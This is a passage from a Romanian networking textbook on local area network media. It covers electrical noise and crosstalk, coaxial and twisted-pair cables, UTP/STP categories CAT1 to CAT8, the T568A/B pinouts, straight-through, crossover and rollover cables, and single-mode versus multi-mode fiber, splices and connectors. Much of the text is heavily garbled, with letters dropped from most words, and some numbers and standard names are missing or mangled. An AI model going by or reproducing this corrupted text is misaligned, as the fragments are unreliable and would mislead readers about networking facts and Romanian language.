e e plu este o o o i e telefo i ă pe a e se aude u zgo ot de fo d. Î siste ele digitale,
zgo otele afe tează alo ile iţilo t a s işi sau , la desti aţie a eştia putâ d fi
i te p etaţi g eşit adi ă î lo de şi i e s .
Zgomotul poate avea mai multe cauze: câmpurile electrice provenite de la motoare
ele t i e, lu i a fluo es e tă eoa e , et . - toate provenite de la surse exterioare cablului
afe tat. A est tip de zgo ot se u eşte EMI Electromagnetic Interference - I te fe e ţă
40 | ‘ e ţ e l e L o a l e
Ele t o ag eti ă da ă p o i e de la su se ele t i e sau ‘FI Radio Frequency Interference -

I te fe e ţă ‘adio â d p o i e de la su se adio, ada sau i ou de. )go otul ai poate
proveni de la liniile de curent alternativ sau de la fulgere.
Fiecare fir dintr-u a lu poate a ţio a a o a te ă. Câ d a est lu u se î tâ plă, fi ul
practic absoarbe semnale electrice din celelalte fire din cablu sau din surse electrice exterioare
a lului. Da ă zgo otul ele t i ezultat atinge un nivel destul de înalt, poate deveni foarte
difi il sau hia i posi il pe t u e hipa e tul de la elălalt apăt să disti gă se alul de
zgomot.
1-6: Efectul zgomotului
Un sistem de transmisie poate fi afe tat de u ele di t e a este tipu i de zgo ot şi i u la

altele. De e e plu, t a s isia opti ă este i u ă la i te fe e ţele ele t i e, deoa e e se alul
pu tat u a e atu ă ele t i ă, i opti ă. A est lu u le fa e ideale pe t u legătu ile din
e te io ul lădi ii, u de t a s isia pe fi ele de up u a putea fi i flue ţată de fulge e,
câmpuri electrice din alte surse, etc.
1.1.5.5 Crosstalk
Ca lu ile de up u su t afe tate de i te fe e ţe ele t o ag eti e de la dife ite su se di
afara cablului. Totuşi, ea ai i po ta tă su să de zgo ot pe t u a lu ile de up u o
ep ezi tă efe tul u it crosstalk: i te fe e ţa se alelo î t e două fi e di i te io ul
a eluiaşi a lu. U a di t e ele ai efi ie te etode de p e e i e a efe tului de crosstalk este
to sada ea fi elo . P i to sada e, â pu ile ele t i e se a ulează şi fi ele di elelalte pe e hi
u ai su t i flue ţate de se alul di pe e hea i iţială. De ulte o i apa î să p o le e la
ataşa ea o e to ilo . După u se a edea în studiul de caz din acest capitol, atunci când se
do eşte ataşa ea unui o e to la apătul u ui a lu t e uie î tâi deto sadate toate perechile
di i te io ul a lului. Da ă se lasă o u ată p ea a e deto sadată, î a ea zo ă â pu ile
electrice generate de fiecare fir dintr-o pe e he u se o ai a ula şi a apă ea o i te fe e ţă
î t e fi e, u ită NEXT Near-End Crosstalk . A est pa a et u, NEXT, este spe ifi fie ă ui
a lu. Cu ât u a lu este te i at adi ă ufa este se tizată u ai ultă ate ţie, u atât
efectul NEXT a fi ai i . Valoa ea a i ă a pa a et ului NEXT este spe ifi ă fie ă ei
categorii de cablu (Cat3, Cat5, Cat : u ât atego ia este ai a e, u atât i te fe e ţa NEXT
t e uie să fie ai i ă adi ă se i pu e o alitate ai idi ată a se tiză ii cablurilor).
Te i a ea u g ijă a a lu ilo este ea ai i po ta tă etodă de p e e i e a efe tului
de crosstalk.
1.2 Soluţii de comunicaţie pe cupru

1.2.1 Cablul coaxial
‘eţele de a lu oa ial au a ut pe ioada de i pa t a i la ju ătatea a ilo ` . Odată
cu apa iţia ediilo to sadate UTP, “TP popula itatea lo a î eput să s adă. Deşi ofe ă o ai
u ă e a a e şi pe it dista ţe ai a i, ediul oa ial este u ul a alogi , sp e deose i e
de ediul to sadat u de t a s isia se ealizează digital. Eli i a ea etapelor de conversie
digital-a alogi au pe is ostu i ai eduse pe t u e hipa e tele de eţea desti ate eţelo
azate pe UTP. Î plus, folosi ea u o pe e hi disti te pe t u t a s isie şi e epţie fa di
UTP u ediu de o u i aţie full-duplex, spre deose i e de eţelele azate pe edii de
t a s isie oa iale. ‘eţelele de date azate pe a lu oa ial ai pot fi î ă î tâl ite î azul
u o i i eţele de a tie , da î ulti ii a i a estea au de e it e t e de a e.
1.2.2 Cablul torsadat

Cablul torsadat este fo at di ai ulte fi e de up u izolate, a â d o g osi e tipi ă de
, î pletite două âte două to sadate . Majo itatea a lu ilo to sadate folosite pe t u
eţele lo ale o ţi opt fi e, aşada , pat u pe e hi. ‘ăsu i ea fi elo di t -o pereche este
e esa ă pe t u a ula ea efe tului de a te ă a a te isti lii ilo lu gi. A est efe t a p odu e
i te fe e ţe ele t i e, eea e a o du e la pie de i de date.
1-7: Cablu UTP
Pe lâ gă i te fe e ţele cauzate de câmpurile electrice induse de alte fire din interiorul

a eluiaşi a lu, pot apă ea şi i te fe e ţe di su se e te ioa e a lului de e e plu: e iste ţa
u ui oto ele t i î ap opie e, sau, pe t u a lu ile aflate î e te io ul lădi ilo ,
des ă ă ile ele t i e di at osfe ă . O etodă p i a e se î ea ă edu e ea la i i a
i te fe e ţelo e te ioa e este t a s ite ea dife e ţială. T a s ite ea dife e ţială, sau
t a s ite ea î od ala sat, p esupu e a se alul util t a s is să ep ezi te dife e ţa
di t e se alele ele t i e de pe ele două fi e ale u ei pe e hi. Astfel, da ă apa i te fe e ţe
ele t i e de la su se e te ioa e a lului, a estea o afe ta a ele fi e î od egal, dife e ţa
di t e se ale ă â â d o sta tă. O altă etodă de p e e i e a i te fe e ţelo e te ioa e
este e a a ea a lu ilo . E a a ea p esupu e e iste ţa u ui î eliş fo at di t -o plasă sau
o foiţă etali ă e a e ol de uş ă Faraday.
Di pu t de ede e al e a ă ii, e istă două felu i de a lu i to sadate: ecranate
(shielded şi ee a ate unshielded). Cele neecranate se numesc UTP (unshielded twisted
pair şi su t ele ai folosite î ad ul eţelelo lo ale de al ulatoa e, fii d, de altfel, şi ele
mai ieftine.
Deza a tajul a lu ilo UTP este ă u pot fi folosite î e te io ul lădi ilo , deoa e e a fi
supuse u o posi ile şo u i ele t i e foa te a i, e a du e la defe ta ea e hipa e telo
o e tate. De a eea, î e te io ul lădi ilo se foloseşte, î ge e al, a lu e a at: “ TP
(screened twisted pair), STP (shielded twisted pair) sau S/STP (screened shielded twisted pair).
“ TP, u it şi FTP foiled twisted pair , a e u si gu î eliş de e a a e e te io şi este doa
u puţi ai g os de ât UTP. Ca lul “TP a e, pe lâ gă î elişul de e a a e identic cu cel de la
42 | ‘ e ţ e l e L o a l e
“ TP, âte u î eliş sepa at pe t u fie a e pe e he. A est lu u îl fa e ult ai eziste t la

i te fe e ţe, da şi ult ai s u p. Î plus, fii d ai igid, este şi e a ai g eu de a e at.
1-8: Cablu STP
Di pu t de ede e al alea ilităţii, a lu ile to sadate se î pa t î solide şi liţate. Cele

solide au î i te io ul fie ă uia di t e ele opt fi e ale a lului âte u si gu fi de up u de
aproximativ 1mm, spre deosebire de cele liţate, la a e fie a e fi este fo at di t -o ulţi e
de fi e foa te su ţi i, u ite liţe. Ca lu ile liţate su t aşada ai fle i ile, fii d pot i ite
pe t u a lă ile o izo tale de la p iza de pe ete pâ ă la staţia utilizato ului , î ti p e
cablurile solide su t folosite la a lă ile e ti ale a olo u de este e oie, de o i ei, de a lu i
rigide).
1-9: UPT solid şi lițat
1.2.2.1 Standarde pentru medii torsadate

Cole ţia IEEE . up i de sta da dele e defi es i elul fizi şi su i elul MAC al
i elului legătu ă de date pe t u Ethernet. Este definit câte un standard pentru fiecare tip de
ediu de t a s isie folosit. Astfel, î a eastă ole ţie se egăses , p i t e altele, sta da dele
pentru cablu UTP, standardele pentru Ethernet pe cablu coaxial (10BASE5, 10BASE2), Ethernet
p i fi ă opti ă BA“E-F, 100BASE-FX, etc) sau descrierea tehnologiei PoE (Power over
Ethernet).
“ta da dul e o ţie e i ţele pe t u t a s ite ea a M it/s pe a lu UTP este
standardul 10BASE-T. Î od si ila , pe t u M it/s şi M it/s G it/s e istă
100BASE-T, respectiv 1000BASE-T u it şi Gigabit Ethernet . Nu ele sta da dului de i ă di
u ele aspe te legate de ediului fizi : Nu ă ul ep ezi tă iteza a i ă teo eti ă e p i ată
î ega iţi pe se u dă. „BA“E este p es u ta ea pe t u baseband, eea e î sea ă ă
fie a e fi este folosit a u si gu a al de o u i aţie, pe a e se t a s ite î t -o si gu ă
f e e ţă. Cu alte u i te, u se apli ă nicio fo ă de ultiple a e. Lite a de la sfâ şit

ep ezi tă tipul a lului, î a est az, „T î sea ă to sadat (twisted). Aşada , BA“E-T este
o de u i e ge e i ă pe t u u sta da d a e asigu ă o iteză de M it/s pe a lu to sadat.
În particular, sunt definite trei forme : 100BASE-TX, 100BASE-T şi BA“E-T2. 100BASE-TX
indicǎ utiliza ea u ui a lu de atego ie el puţi CAT şi folosi ea a pe e hi de fi e di ele
. “ufi ul T i di ă folosi ea a pe e hi pe t u o u i aţie. BA“E-T şi BA“E-T2 nu se
mai foloses , fii d sta da de î e hite. Toate a este sta da de ope ează pe seg e te de
cablu cu lungimi de maxim 100 de metri.
În 2006 a fost publicat standardul 10GBASE-T pentru conexiuni de 10 gigabit/s prin cablu
torsadat. 10Gigabit Ethernet supo tă doa legături full-duplex, spre deosebire de celelalte trei
sta da de e supo tă şi o u i aţii half-duplex.
După u s-a e ţio at la î eputul a estui apitol, a titatea de i fo aţie t a sfe ată
î t e e iţăto şi e epto este p opo ţio ală u f e e ţa se alelor pe mediul de transmisie.
Î azul se alelo ele t i e, f e e ţa este dată de alitatea up ului de a fi ai u sau ai
puţi u o du to de u e t ele t i . A eastă alitate depi de de de sitatea de i pu ităţi
a a te isti ă ate ialului. De a eea, e istă ai ulte atego ii de a lu i, o atego ie ai
a e i pli â d pe fo a ţe ai u e.
1.2.2.2 Categorii de medii torsadate

Categoriile de cabluri torsadate au fost definite în setul de standarde TIA/EIA-568-B de
căt e aso iaţia a e i a ă Telecommunications Industry Association (TIA). Acesta s-a dovedit a
fi standardul cu cea mai largă a epta e î piaţa p odu ăto ilo de soluţii pe t u i elul fizi .
1.2.2.2.1 UTP CAT1-4

Ca lul î ad at la atego ia CAT este el folosit î se i iile de telefo ie lasi ă POTS
– Plain Old Telephone Service sau so e iile de la uşi. A eastă eti heta e este u a i p op ie,
întrucât setul de standarde TIA/EIA-568-B u e u oaşte î o e tul de faţă de ât atego iile
, e, şi a.
Standardul C3 a fost folosit în anii `90 pentru TokenRing şi pe t u Ethernet, ajungând la
iteze de pâ ă la M it/s. Astăzi, a esta este folosit î siste ele de telefo ie şi poate fi uşo
adaptat pentru Voice over IP VoIP î t u ât iteza de M it/s pe a e o ofe ă depăşeşte u
ult e i ţele de , M it/s ale u ui telefo VoIP la î ă a e a i ă. Î plus, CAT este
o pati ilă u teh ologia Power over Ethernet defi ită î sta da dul . af PoE , teh ologie
e des ie u siste p i a e odată u datele se t a sfe ǎ şi e e gie ele t i ă, to ai în
s opul ali e tă ii a u ito apa ate aflate la dista ţă, p e u telefoa ele VoIP. Apa iţia
standardului 100BASE-T a dus la eşte ea itezei la M it/s p i utiliza ea a pe e hi de
fi e şi u doa u p e edea sta da dul a te io , eea e a pe is infrastructurilor mai
e hi, deja e iste te, de a lu i CAT să ofe e o lăţi e de a dă ai a e. Cu toate a estea,
utiliza ea sa pe t u o u i aţiile de date a s ăzut odată u apa iţia sta da dului CAT .
“ta da dul CAT ofe ea o f e e ţă u puţi ai a e de ât CAT , MHz faţă de MHz
şi e a utilizat pe t u o a ia tă î u ătăţită a eţelelo Token Ring.
1.2.2.2.2 UTP CAT5 şi CAT5e

“pe ifi aţiile a lului de atego ia , defi ite î TIA/EIA-568-B, i di ă o f e e ţă a i ă
de 100MHz. CAT5 este folosit în spe ial î eţele de M it/s FastEthernet), dar poate fi
utilizat şi pe t u Gigabit Ethernet.
Odată u defi i ea î a CAT e enhanced) în TIA/EIA-568-B, spe ifi aţiile a ia tei
originale CAT5 nu mai sunt recunoscute în aceste standarde.
44 | ‘ e ţ e l e L o a l e
UTP CAT5e a de e it el ai ăspâ dit ediu de t a s isie pe t u eţelele lo ale.

Dato ită pe fo a ţelo î u ătăţite faţă de e siu ea o igi ală, şi dato ită u ui p eţ ult
ai i de ât al CAT , CAT e este ea ai pot i ită alege e pe t u i f ast u tu a eţelelo
Gigabit Ethernet. Cu toate a estea, CAT e e ţi e e o a da ea li ită ii seg e telo de la
a lu la de et i, la fel a şi î azul elo lalte tipu i de a lu i defi ite de TIA/EIA.
Este de eţi ut faptul ă sta da dul folosit pe t u Gigabit Ethernet, 1000BASE-T, impune
utilizarea a 4 perechi de fire torsadate, spre deosebire de versiunile anterioare (10BASE-T şi
100BASE-T a e foloseau î o u i aţie doa două pe e hi. Aşada , sta da dul de Ethernet
ales pe t u i f ast u tu ă este el a e spe ifi ă u ă ul de pe e hi e esa e î o u i aţie,
şi u sta da dul de a lu. Catego ia spe ifi ă doa a a te isti ile spe ifi e a lului, p e u :
u ă ul de pe e hi e iste te, pasul de to sada e, dia et ul fi elo , pa a et ii NEXT, FEXT şi,
cel mai important, limita supe ioa ă de f e e ţă. Astfel, u a lu CAT e folosit pe t u
100BASE-T (FastEthernet utilizează î o u i aţie pe e hi de fi e di ele dispo i ile, î
ti p e a elaşi a lu pe t u i f ast u tu i de BA“E-T (Gigabit Ethernet e esită toate
cele 4 perechi.
1.2.2.2.3 UTP CAT 6, CAT6a

UTP CAT adu e î u ătăţi i ajo e, p e u i pu e ea u ui pas de to sada e ult ai
i de ât la CAT şi o li ită supe ioa ă de f e e ţă de MHz, fii d o eput spe ial pe t u
eţelele Gigabit Ethernet. Standardul de cablu atego ia păst ează o pati ilitatea u
sta da dele CAT , CAT e şi CAT .
Deşi CAT este ai f e e t folosit î eţelele Gigabit Ethernet, spe ifi aţiile sale pe it şi
implementarea standardului 10GBASE-T apă ut î , da u ai pe seg e te de de
et i. Pe t u a fa e posi ilă utiliza ea sta da dului BA“E-T pe lungimi de 100 de metri, se
i pu e folosi ea u ui ou tip de a lu, defi it a sta da d TIA î fe ua ie , şi a u e
categoria 6a.
Ca lul UTP CAT a aug e ted ope ează la f e e ţe de pâ ă la MHz du lu faţă de
CAT6), fiind destinat infrastructurilor de 10GBASE-T (10 Gigabit Ethernet).
1.2.2.2.4 UTP CAT7, CAT8

“ta da dul de a lul atego ia CAT a e u pas de to sada e şi ai i de ât CAT şi,
î o i aţie u o e to i de tip GG , poate t ata se ale u a da de f e e ţă de pâ ă la
MHz. Î plus, fie a e di t e ele pat u pe e hi de fi e este e a ată i di idual pe lâ gă
î elişul e te io al a lului . Deşi a fost eat pe t u 10 Gigabit Ethernet, ea ai folosită
tehnologie pentru 10GBASE-T ă â e CAT a.
Catego ia este şi ea ai st i tă î p i i ţa o elo de sigu a ţă efe itoa e la
o po ta e tul a lu ilo î situaţii de i e diu: iteza de ăspâ di e a fo ului, su sta ţe
e a ate, et . U e e plu a e să justifi e e esitatea u o astfel de egle e tă i este el al
a lu ilo u î elişul di PVC, foa te popula e dato ită p etului s ăzut. Î o e tul î a e
iau fo , a este a lu i degajă su sta ţe foa te to i e o ului, fii d total epot i ite pe t u
a lă ile o izo tale.
UTP CAT8 este destinat infrastructurilor multimedia, un astfel de cablu putând transporta
simultan oricare patru servicii de tip TV, video, satelit, audio, date, etc. Cablul UTP Cat 8
ope ează u f e e ţe de MHz şi poate aju ge la a i MHz.
Categorie Viteza de
cablu Fre e ță transmisie Utilizare
Telefonia
Cat 1 1Mbps lasi ă
Transmisiuni
Cat 2 4Mbps seriale
TokenRing
10 Mbps 10BaseT
Cat 3 16MHz 100 Mbps 100BaseT4
TokenRing
16 Mbps 10BaseT
Cat 4 20MHz 100 Mbps 100BaseT4
ATM,
TokenRing,
10 Mbps 10BaseT
Cat 5 100MHz 100 Mbps 100BaseTX
10 Mbps 10BaseT,
100 Mbps 100BaseTX,
Cat 5e 155MHz 1 Gbps 1000BaseT
100Mbps 100BaseTX
Cat 6 250MHz 1 Gbps 1000BaseT
Cat 6a 500MHz 10 Gbps 10GBaseT
Cat 7 625MHz 10 Gbps 10GbaseT
Cat 8 1200Mhz 10 Gbps 10GbaseT
1-10: Categorii de cablu
1.2.2.3 Tipuri de cabluri UTP

Procedura de fixare a firelor unui cablu într-un conector se numeşte se tiza e. “ta da dul
TIA/EIA- B spe ifi ă două odu i î a e pot fi o do ate fi ele la o te i aţie a a lului,
se ţiu ea o espu zătoa e fii d p o a il şi ea ai u os ută di î t eaga do u e taţie.
Pe t u a fi uşo ide tifi ate, ele opt fi e sunt colorate diferit. Culorile folosite pentru cele
pat u pe e hi su t: al ast u, e de, po to aliu şi a o. Pe t u a deose i fi ele u ei pe e hi,
u ul a e î elişul de uloa e u ifo ă, elălalt a â d doa o du gă di uloa ea espe ti ă pe
fond alb. Cele două odu i spe ifi ate de TIA/EIA-568-B pentru ordonare firelor se numesc
T A sta da d folosit ai ult î “tatele U ite şi T B folosit î ge e al î Eu opa .
Pin T568 B Pin T568 A

1 Alb-portocaliu 1 Alb-Verde
2 Portocaliu 2 Verde
3 Alb-Verde 3 Alb-portocaliu
4 Albastru 4 Albastru
5 Alb-albastru 5 Alb-albastru
6 Verde 6 Portocaliu
7 Alb-maro 7 Alb-maro
8 Maro 8 Maro
1-11: Codurile culorilor în cablul UTP
46 | ‘ e ţ e l e L o a l e
După u se ştie, tehnologiile BaseTX şi BaseT foloses doa două pe e hi di ele

pat u: u a pe t u t a s isie T + şi T - şi u a pe t u e epţie ‘ + şi ‘ -). Conform
sta da delo de ai sus, a estea su t po to aliu şi e de pi ii , , şi . Ate ţie: fi ele de T
precum şi fi ele de ‘ t e uie să fa ă pa te di a eeaşi pe e he! “e o se ă ă p i a pe e he
aju ge pe pi ii şi ia a doua pe e he pe pi ii şi .
Î fu ţie de o espo de ţa pe e hilo di t -u apăt u pi ii de la elălalt apăt, a lu ile
se împart în trei categorii:
1.2.2.3.1 Straight-through
Cablul direct (straight-through a e a ele apete se tizate o fo a eluiaşi sta da d
(T568A - T568A în SUA, sau T568B - T B î Eu opa . “e foloseşte atu i â d se o e tează o
staţie la u s it h sau la u hu . Cele două apete a â d a eeaşi o di e a fi elo , fie a e pi al
conectorului dintr-u apăt o u i ă di e t u pi -ul o espu zăto al o e to ului de la
elălalt apăt al a lului.
Atu i â d se o e tează o staţie la u s it h sau hu se foloseşte u a lu direct!
1.2.2.3.2 Crossover
Cablul crossover se foloseşte la conectarea a două al ulatoa e î t e ele, fă ă a ai folosi
u s it h sau u hu . P i felul î a e este o st uit a est a lu, pi ul de la u apăt a
o espu de pi ului de la elălalt apăt, ia pi ul pi ului . A easta î sea ă ă datele
t a s ise p i pe e hea T de la u apăt o aju ge pe pi ii de ‘ de la o e to ul opus.
Astfel, două al ulatoa e pot t a sfe a date di e t î t e ele, fă ă a ai t e e p i t -un alt
e hipa e t, da ă plă ile lo de eţea su t legate p i t -un cablu crossover. Întrucât singura
dife e ţă di t e T A şi T B este i e sa ea pe e hii po to alii u pe e hea e de, u
a lu osso e poate fi ăzut a a â d u o e to se tizat o fo T A şi pe elălalt
conform T568B. U astfel de a lu a fu ţio a pe t u sta da dul BA“E-T sau 10BASE-TX,
unde se folosesc doar 2 perechi. Pentru 1000BASE-T (Gigabit crossover î să, t e uie i e sate
şi elelalte două pe e hi al ast u şi a o , şi, î plus, s hi ate î t e ele fi ele fie ă ei
pe e hi ea du gată u ea u ifo ă .
Pe t u a t a sfe a date di e t î t e două staţii, se foloseşte u a lu osso e !
1.2.2.3.3 Rollover
Ca lul de o solă rollover este folosit atu i â d se do eşte o e ta ea pe u po t de
o solă a u ui router. E istă ai ulte a ia te de a lu i e pot fi folosite pe t u a fa e
legătu a î t e u PC şi u po t de o solă al u ui router. Întotdeauna portul calculatorului
pe t u o astfel de legătu ă este u ul se ial DB-9 sau DB-25). Portul de pe router poate fi DB-
25 sau RJ- . Astfel, se poate folosi u a lu e a e a te i ato i o ufă DB- şi u a ‘J-45
sau un cablu rollover şi u adapto ‘J – DB9 (sau RJ45 – DB25).
1.3 Soluţii de comunicaţie pe fibră optică

Fi a opti ă este el ai ou ediu de t a s isie dez oltat pe t u eţele de al ulatoa e,
a â d u e oase a a taje faţă de a lu ile de up u, di t e a e ele ai i po ta te su t
iteza de t a s isie supe ioa ă pe a e o supo tă şi i u itatea la i te fe e ţe ele t i e.
P i ipalele deza a taje su t ostul şi difi ultatea a e ă ii şi i stală ii. A est ediu este
folosit u p epo de e ţă pe t u legătu i pu t la pu t la dista ţe a i peste âte a sute de
metri).
U siste de t a s isie pe fi ă opti ă este fo at di t -u e iţăto LED sau lase , o

fi ă t a spo toa e şi u e epto . “e alul pe fi ă opti ă este, de fapt, u da lu i oasă
e isă de u LED sau de u lase , î fu ţie de tipul de fi ă.
S-a o se at ă pe t u a u ite lu gi i de u dă se alul sufe ă o ate ua e ai i ă
decât pentru altele. În urma studiilor, s-au sta ilit t ei i te ale „fe est e pe t u alo ile
lu gi ilo de u dă la a e ate ua ea este foa te s ăzută şi a e pe it e iţăto ului să
ge e eze ai ulte se ale lu i oase, ia e epto ului să dete teze ai ulte se ale.
Aceste intervale sunt prezentate în graficul de mai jos.
1-12: Intervalele de lungimi de undǎ pentru care atenuarea este minimǎ
Notaţiile OH- i di ă faptul ă la a ele lu gi i de u dă î od spe ial, p eze ţa io ilor OH-

di ate ialul fi ei opti e p odu eşte i foa te a i ale ate uă ii. De a eea, lu gi ile de
u dă utilizate î siste ele opti e su t: , pe t u fi a multi-mode şi ,
1550nm (pentru single-mode).
Interiorul fibrei optice este format din miez (core şi î eliş cladding , două tu u i
o e t i e de sti lă, i sepa a ile, a â d i di i de efle ie dife iţi. P opaga ea se alului se
azează pe fe o e ul de efle ie totală. Cladding-ul, foa te su ţi e, u dia et ul de
microni, este învelit în trei straturi protectoare: un strat numit buffer, de obicei colorat, un
î eliş eziste t de p ote ţie fa i at di ke la di a est ate ial se fa i ă şi estele a ti-
glo ţ u it Aramid Yarn şi u î eliş e te io di PVC jacket). Aceste trei straturi au rol de
p ote ţie pe t u pa tea di sti lă a e este foa te f agilă.
1-13: Structura fibrei optice

48 | ‘ e ţ e l e L o a l e
Î fu ţie de odul de t a s isie şi, i pli it, de di e siu ea core-ului, fibrele optice se
î pa t î două atego ii: single-mode şi multi-mode.
1.3.1 multi-mode
Fibra multi-mode are dimensiunea core-ului de sau , i o i, a est lu u pe iţâ d
t a s ite ea se alului p i efle ie î pe eţii o e-ului. A est tip de fi ă pe ite dista ţe
mai mici decât cea single-mode deoa e e lu i a a e u d u ai lu g de pa u s , î să este
ai iefti ă şi ai uşo de folosit ai uşo de te i at u o e to i şi de sudat . De ase e ea,
e hipa e tele a e e it se al pe fi a opti ă multi-mode sunt mai ieftine, deoarece
folosesc LED-uri (light emitting diode) u lu gi i de u dă de sau a o et i. A este
echipamente cu LED-u i u su t pe i uloase pe t u oa e i u afe tează o hii .
1-14: Structura fibrelor optice single-mode şi multi-mode
1.3.2 single-mode
Fi a opti ă single-mode are o dimensiune a core-ului de i o i ai ou î t e şi
i o i , a esta a ţio â d a u ghidaj pe t u aza lu i oasă a se alului a e se t a s ite
astfel ap oape fă ă reflexie. Echipamentele terminale folosesc pentru a emite semnale
lu i oase lase e u lu gi i de u dă de sau a o et i. Deoa e e lase ul e ite o
u dă lu i oasă foa te pute i ă şi fo alizată, a este e hipa e te pot p odu e leziu i g a e
ochiului. Aşada , da ă e să ede lu i ă î t -o fi ă opti ă, el ai i e a fi să alege u
echipament multimode sau o la te ă!
1.3.3 Comparaţie între single-mode şi multi-mode

Fi a opti ă single-mode pe ite dista ţe ai a i de t a s isie de ât ea multi-mode,
î să este ult ai s u pă şi i pu e p e auţii spe iale. De ase e ea, e hipa e tele pe t u
single-mode sunt mai scumpe decât cele pentru multi-mode.
Di pu t de ede e al itezei a i e de t a s isie, li ita fizi ă este i pusă de
teh ologia folosită de e hipamentele terminale, mai exact de viteza cu care sunt convertite
i pulsu ile ele t i e î se al opti , li ita teo eti ă a lăţi ii de a dă pe fi a opti ă î si e
fii d foa te a e ~ T ps . Deşi, de e e plu, sta da dul Ethernet 802.3 pentru transmisie
pe fi a opti ă li itează lu gi ea u ui seg e t de fi ă opti ă multi-mode la k şi u ul de
single-mode la k , t e uie e ţio at ă a este li ite se efe ă la odul de fu ţio a e
CSMA-CD atu i â d su t posi ile oliziu i . Deoa e e î azul legătu ilo de fi ă opti ă
sunt implicate conexiuni punct la punct, unde transmisia este full-duplex şi u e istă
posi ilitatea apa iţiei oliziu ilo , li ita ea dista ţei a i e la a e se poate î ti de u
seg e t de fi ă opti ă este dată u ai de pute ea de emitere a dispozitivelor terminale,
putând ajunge în cazul transmisiei single-mode şi la de k pe t u FastEthernet şi ult ai
mult pentru alte tehnologii.
1-15: Categorii de fi ră şi oduri de propagare
O o pa aţie î t e lase ele se i o du toa e şi LED-u i a su se de lu i ă este p eze tată

în tabelul de mai jos:
Criteriu LED Laser

Lu gi ea de u dă folosită 850nm sau 1300nm 1310nm sau 1550nm
Tip de fi ă Multimode Singlemode
Viteza de transfer a datelor Mi ă Mare
Dista ţă “ u tă Lu gă
Cost Redus Ridicat
Du ată de iaţă Lu gă “ u tă
1.3.4 Mod de construcţie, conectori

P o edeul i dust ial de o st u ţie al fi ei opti e este foa te deli at şi, de a eea, foa te
s u p. A est p o edeu se u eşte OVD Outside Vapor Deposition , ia fi a ezultată este
si teti ă şi a e o o siste ţă şi o geo et ie e t e de p e ise. Î li ii a i, p i dife ite
p o ese hi i e şi la te pe atu i foa te î alte, se o ţi doi ili d i o e t i i de sti lă foa te
pu ă, după a e ili d ul astfel ezultat se t age şi se alu geşte pâ ă â d se o ţi e o fi ă
a e este ulată pe o olă a e. P o esul este o ti uu, adi ă pe ăsu ă e se t age, se ulează
fi a o ţi ută pe olă. A u se e pli ă de e fi a opti ă single-mode este ai s u pă de ât
cea multi-mode.
Fi a opti ă folosită î e te io ul lădi ilo este dife ită de fi a pe t u a la ea de
i te io . Pe t u a lă ile de e te io se foloseşte fi a loose-tube e o ţi e ai ulte pe e hi
de fibre, fiecare dintre acestea având doar core şi cladding. O fi ă de e te io poate o ţi e
de la âte a pe e hi pâ ă la ii de pe e hi de fi e, ostul el ai a e pe t u o i stala e de
e te io fii d a ope a şi u fi a p op iu-zisă.
Pe t u a la ea de i te io pute î tâl i două tipu i de fi ă: a lu i u ai ulte
perechi, numite tight-buffer şi a lu i u o si gu ă fi ă, u ite patch-uri. Cablurile cu mai
ulte pe e hi su t folosite pe t u a la ea o izo tală, î e e e patch-urile sunt folosite
pentru interconectarea dispoziti elo pe dista ţe i i.
1.3.4.1 Î i ări
Prin îmbinare (splicing se î ţelege o e ta ea pe a e tă a două a lu i de fi ă opti ă.
Î i ă ile se ealizează u ajuto ul u o dispoziti e u ite splice-uri. Caracterul permanent al
50 | ‘ e ţ e l e L o a l e
î i ă ii este el a e fa e dife e ţa î t e u o e to şi u splice. Totuşi, te i ologia poate

ea o fuzii, deoa e e e istă p odu ăto i e ofe ă şi splice-uri nepermanente, care pot fi
de uplate î s opul efe tuă ii u o epa aţii sau ea a jǎri.
Î i ă ile su t e esa e, sp e e e plu, pentru realizarea unor cabluri cu lungimi mai mari
de ât ele p edefi ite. “e poate î tâ pla adesea a u i stalato de fi ă opti ă să ai ă î sto
ai ulte a lu i u di e se lu gi i î ge e al p odu ăto ii ofe ă a lu i de lu gi e li itată
– maxi k da să u ai ă u ul de k . Cu ajuto ul splice-u ilo se pot î i a două sau
ai ulte seg e te pe t u a o ţi e a lul de lu gi ea do ită.
‘ealiza ea î i ă ilo e esită o ali ie e foa te p e isă a elo două core-uri, astfel încât,
la trecerea lu i ii p i pu tul de jo ţiu e, să se pia dă ât ai puţi ă e e gie. Cu alte
u i te, t e uie a ap oape toată lu i a e ită pe o fi ă să aju gă î core-ul celei de-a doua.
Co ta tul efe ti î t e ele două tu u i de sti lă u este eapǎrat necesar. Cea mai mare
provocare pentru designer-ii de splice-uri este datǎ de necesitatea alinierii foarte precise.
E istă două a i tipu i de î i ări: e a i e sau p i sudu ă.
Î i ă ile p i sudu ă foloses u a ele t i pe t u a topi şi suda ele două fibre de
sti lă. A este sudu i i pli ă o p o edu ă o pli ată de ali ie e, o t olată p i al ulato , şi
euşes să li iteze pie de ile la doa , dB. Costu ile a ope ei pe t u a est tip de î i a e
su t, î să, foa te idi ate, la fel şi ostu ile de ti p.
Î i ă ile e a i e su t apid de i ple e tat şi u e esită o i st ui e p eala ilă, î să
pierderile sunt de aproape 0,2dB.
1.3.4.2 Conectori
U a lu de fi ă opti ă poate fi te i at î două felu i – folosind splice-uri prin care se
ealizează î i ă i pe a e te sau epe a e te î t e două fi e sau folosi d o e to i
pe t u upla ea a lului la u e hipa e t de eţea. A este te i aţii t e uie să fie alese î
o fo itate u tipul fi ei şi i stalate astfel î ât să i i izeze pie de ile de lu i ă şi să u
pe ită păt u de ea i pu ităţilo . Î t u ât fi a opti ă a apă ut la sfâ şitul a ilo ` ,
p odu ăto ii au s os pe piaţă peste de odele de o e to i şi u e oase etode de
i stala e, fie a e î e â d să s adǎ cât mai mult atenuarea (pierderea de semnal şi efle ia
apa iţia de se ale eziduale . Di t e a estea, î să, doa âte a tipu i su t folosite î od
curent. Cei mai populari conectori sunt cei de tip ST (Straight Tip şi “C Subscriber Connector).
Co e to ul de tip “T, apă ut î , a e o fo ă i ula ă, ase ă ătoa e î t -o a u ită
ăsu ă u BNC-ul şi este î ă folosit pe t u eţelele ulti ode. Cili d ul fe ula a e susţi e
fi a a e , , la fel a ajo itatea o e to ilo şi este o fe ţio at el ai adesea di
e a i ă sau etal şi areori din plastic. Întrucât îmbinarea se face prin presare, se poate
î tâ pla să u fie poziţio at o e t şi, de a eea, î az ă se sesizează pie de i p ea a i,
t e uie s os şi e o e tat. Di pă ate, a est o e to o upă lo ult şi, de a eea, o e to ul
e o a dat î a est o e t este “C, a e a e o fo ă d eptu ghiula ă şi o o e ta e de tip
push-pull.
SC a fost definit în standardul TIA-568-A, dar nu a fost folosit la început deoarece costa de
